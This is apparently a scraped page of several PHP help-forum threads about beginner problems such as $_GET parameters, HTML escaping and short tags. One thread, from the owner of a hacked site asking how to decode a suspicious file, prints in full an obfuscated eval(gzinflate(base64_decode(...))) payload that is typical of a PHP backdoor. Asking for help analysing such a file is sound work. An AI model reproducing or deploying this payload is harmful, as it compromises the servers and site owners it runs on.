So I'm trying to do something extremely simple, and after reading through forums, and researching on google I still can't figure out why this is not working. But this is mostly like because I'm still a very much noobie programmer. I'm trying to send information through a url, and having a script pick it up using the $_GET super global.
Here's the link code, in a file called TESTFORM.php:
<p>
Here's a link:
ID
</p>
This is the TESTGET.php script:
<?php
if (isset($_GET['id']))
echo 'it is set<br />';
else
echo 'it is not set<br />';
?>
This yields in a "It is not set" appearing on the page every time. Any thoughts? Are there ghosts in my computer ruining my code? Thanks for taking the time to read through this! Happy coding!
I'm no PHP programmer, but I do know from HTML that computers (especially file names) don't "like" spaces. Try removing the spaces in the id = 5 code.
Your problem is the extraneous space here around the URL parameters:
ID
That will result in PHP seeing the parameter as $_GET["id_"]. The space gets converted into an underscore.
It's always best to use var_dump($_GET); or var_dump($_REQUEST) when you run into such problems. Secondarily it is sometimes helpful to get rid of isset in such cases. Albeit you have a custom error message in place of the language notices intended just for that.
Have you tried to remove spaces in your link?
ID
Code seems fine at a glance, have you tried removing the spaces in
?id = 5 to ?id=5
Related
I'm maintaining a PHP site that is very old and very funky.
Last night the site got hacked. I found this one file that I'm not sure if its from the hackers or from the aforementioned funkiness. Does anyone know how I can decode this:
<?php
eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B");
?>
thanks,
Jack
Replace eval to echo. Repeat
http://pastebin.com/3X2FcvW3
I was trying to do sprintf("<%s>", "Sat");, but nothing comes out. When you remove the less than symbol, it will start working again. Anyone experience this behavior and whether it expected? as i think it is a bug.
You can even get the same result here with printf.....
http://writecodeonline.com/php/
Your browser is probably rendering it as a tag. View source to confirm.
http://codepad.org/g5FXZAwa
<?php
printf("<%s>", "Sat");
Prints <Sat>
Edit for Yogesh.
<?php
echo sprintf("<%s>", "Sat");
Prints <Sat>
I believe that this happens because <Sat> is interpreted by your browser as a tag.
I'm quite new here. I'm trying to make a blog/journal site that allows users to post their own journal. I'm still quite reluctant on making it because I am really afraid of malicious code injections.
So here's a sample code:
<?php
$test = "<b>blah</b>"; //User input from SQL
echo "$test";
?>
What will come out is just the word "blah" in bold right? What I was trying to achieve was to echo "<b>blah</b>" instead. I don't want people to put some PHP codes that can actually mess up my whole web page. Please keep in mind that the variable $test is actually a MYSQL query, so that variable will be needed as an example. I know you can do echo '$test'; but it just comes out as "$test" instead. I feel like pulling my hair out I can't figure it out yet.
The second solution I know of is the htmlspecialchars(); function, but I want the strings to display as what I typed, not the converted ones...
Is there any way I can do that?
I think the OP wants the HTML itself to be output to the page, and not have the tags stripped. To achieve this, you can run the string first through htmlentities()
$test = '<b>blah</b>';
echo htmlentities($test);
This will output:
<b>blah</b>
Which will render in the page as
<b>blah</b>
Echo don't execute PHP code from string. This is impossible and this is not security hole in your code.
You can use a template engine like Twig for exemple.
If htmlspecialchars(); is not the one you are looking for, try the header() option.
header('Content-type: text/plain');
When you are gonna give <b>Hi</b> to a browser, it will be displayed in Bold and not the text be returned. But you can try this way, outputting it inside a <textarea></textarea>.
Or the other way is to use htmlentities():
<?php
$test = "<b>blah</b>"; //User input from SQL
echo htmlentities("$test");
?>
It keeps killing me for some time...
I'm new to php and I'm writing a parser for price comparison site, therefore I need to have quite a few variables:
$plae = "<pastwisko>";
$user = "<krowa>";
$product "<trawa>";
But without spaces...
Using or echoing those gives me nothing. I've tried to search stackoverflow, google and php documentation and nothing... maybe my english sucks...
Thou I'll be really greatfull for help
If you are echoing those into HTML then they will be parsed as [incorrect] HTML tags by your browser and will not show. You should use htmlentities to make them display as text: http://php.net/manual/en/function.htmlentities.php
You've forgot a "=".
$product "<trawa>";
// Should be.
$product = "<trawa>";
Edit:
Joe has the correct answer to your problem, I ran the script in the terminal and that was the only error I was given. I didn't think of htmlentities, I'm sorry if my post was irrelevant and unnecessary.
I'm trying to get some PHP example code to work on PHP version 5.3.4, Apache 2.2.17 on Windows.
The example says I need PHP 4.0 and above with CURL and contains:
<?
$function = $_GET['function-if-exist'];
$test = "Test";
?>
<? =$test ?>
I don't understand why I'm getting the following errors:
My PHP doesn't understand <? and wants <?PHP instead.
My PHP doesn't like <? =$test ?> and wants something like
<?PHP echo $test ?>
$function = $_GET['function-if-exist']; causes the error "Undefined index" but presumably works for the folks that developed it.
Can anyone help me understand why their code is not working for me?
1) <? is the "short tag". Most servers are configured to not allow short tags. This can be changed in php.ini.
2) Again, short tags. Also I think you can't have a space before the =, but the main problem is the short tags setting.
3) $_GET accesses the query string, so when loading your script you need myscript.php?function-if-exist=something
It is more ideal to check if the parameter is set before continuing to prevent errors being thrown, e.g.
if(isset($_GET['function-if-exist']))
{
$functionexists = $_GET['function-if-exist'];
}
the short tag notation is disabled in your php.ini
you need to remove the space before your equal sign
your _get array contains not the expected index, what url do you enter to access the page?
I don't understand why I'm getting the following errors:
My PHP doesn't understand
To be able to use short tags you will have to enable them via config ... http://www.tomjepson.co.uk/tutorials/35/enabling-short-tags-in-php.html
My PHP doesn't like and wants something like
Once you switch on the short tags you will be able to echo using ... important the equals signs must be touching the ? not variable.
$function = $_GET['function-if-exist']; causes the error "Undefined index" but presumably works for the folks that developed it.
The $_GET is populated according to what is in the url. To get a value in $_GET['function-if-exist'] the url accessing the script should be something like mydemo.php?function-if-exist=hello
Hope this helps you
Quick answers to 1 and 2 are enable the short_open_tag option into the php.ini file, for the last one is set the error_reporting to a less strict mode.
The reasons of not to adopt such measures are:
the short tag clashes with the xml declaration and is disabled on different host, if you need to manipulate xml or if you need to write portable code is better to resort to the long tag syntax. You lose the ability to echoing data with = but it is a small annoyance to me.
Warning and notices, as php forgive a lot the programmer for missing variables declaration are a blessing for debug. Keep then raised and you will address a lot of mispellings.
Are you sure that function-if-exist is a correct index for your hash? I would check the index first the access them. If the index don't exists is a probable hint that something is going wrong with your code and you should check the reason of the missing.
Better to stop now, as anyone can write a book on this topic, and several ones already done ;)